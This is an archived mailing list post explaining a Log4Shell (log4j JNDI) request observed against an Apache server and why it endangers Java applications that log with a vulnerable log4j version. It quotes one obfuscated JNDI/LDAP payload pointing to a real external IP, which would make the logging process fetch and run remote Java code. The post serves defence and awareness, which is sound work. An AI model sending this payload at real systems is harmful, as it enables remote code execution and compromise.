Good News Everybody!
The new search engine is LIVE!
Please report any problems to david (at) midrange.com.
|
This is the type of request that I'm seeing against an apache web server.
Not vulnerable in itself, but suppose I'm running a java application under
WAS. Logging either within my application or with WAS using a vulnerable
log4j version.
${${lower:${lower:jndi}}:ld${lower:ap}://45.146.164.160:1389/t}
That will cause the process doing the logging to make a connection to the
server running at 45.146.164.160 and execute the java code that it gets
back.
This mailing list archive is Copyright 1997-2026 by midrange.com and David Gibbs as a compilation work. Use of the archive is restricted to research of a business or technical nature. Any other uses are prohibited. Full details are available on our policy page. If you have questions about this, please contact [javascript protected email address].
Operating expenses for this site are earned using the Amazon Associate program and Google Adsense.